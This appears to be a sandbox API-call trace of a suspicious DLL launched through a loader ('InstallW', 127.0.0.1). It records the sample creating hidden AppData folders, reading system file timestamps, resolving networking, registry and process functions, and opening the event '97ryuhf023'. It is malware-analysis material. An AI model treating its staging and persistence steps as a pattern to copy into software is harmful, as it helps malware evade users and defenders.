GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.719] SetLastError (dwErrCode=0x0) [0034.719] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.720] SetLastError (dwErrCode=0x0) [0034.720] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.721] SetLastError (dwErrCode=0x0) [0034.721] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.722] GetLastError () returned 0x0 [0034.722] SetLastError (dwErrCode=0x0) [0034.723] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.723] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.723] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9c8 | out: lpSystemTimeAsFileTime=0x16f9c8*(dwLowDateTime=0xe260dbd0, dwHighDateTime=0x1d3dfba)) [0034.724] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f900, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.724] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f7e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.724] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetLastError () returned 0x0 [0034.725] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.725] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.725] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.725] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.725] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.725] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.725] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.725] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.725] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.726] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.726] GetLastError () returned 0xb7 [0034.726] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.726] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.726] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.726] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.726] wsprintfA (in: param_1=0x16f668, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.726] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.726] wsprintfA (in: param_1=0x16f564, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.726] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.726] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.726] CloseHandle (hObject=0x74) returned 1 [0034.726] GetLastError () returned 0x0 [0034.726] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.726] GetLastError () returned 0x0 [0034.726] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.726] GetSystemDirectoryA (in: lpBuffer=0x16f668, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.726] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.727] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.727] CloseHandle (hObject=0x74) returned 1 [0034.727] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.727] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.727] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.728] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.728] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.728] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.728] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.728] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.728] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.728] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.729] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.730] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.730] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.730] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.730] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.730] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.730] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.731] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.731] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.731] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.731] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.731] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.731] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.731] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.731] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.731] Entry () [0034.731] GetMessageA (lpMsg=0x16fcec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 145 os_tid = 0xdc8 [0036.546] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.547] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.547] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.547] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.547] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.547] GetCurrentThreadId () returned 0xdc8 Process: id = "49" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2175 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2176 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2177 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2178 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2179 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2180 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2181 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2182 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2183 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2184 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2185 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2186 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2187 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2188 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2189 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2190 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2191 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2192 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2193 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2194 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2195 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2196 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2197 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2198 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2199 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2201 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2202 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2203 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2204 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2205 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2206 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2207 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2208 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2209 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2210 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2211 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2212 start_va = 0x530000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2213 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2214 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2215 start_va = 0x720000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Thread: id = 104 os_tid = 0xccc [0034.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f974 | out: lpSystemTimeAsFileTime=0x28f974*(dwLowDateTime=0xe267fff0, dwHighDateTime=0x1d3dfba)) [0034.762] GetCurrentProcessId () returned 0xcc8 [0034.762] GetCurrentThreadId () returned 0xccc [0034.762] GetTickCount () returned 0x17d1b [0034.762] QueryPerformanceCounter (in: lpPerformanceCount=0x28f96c | out: lpPerformanceCount=0x28f96c*=371986065) returned 1 [0034.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 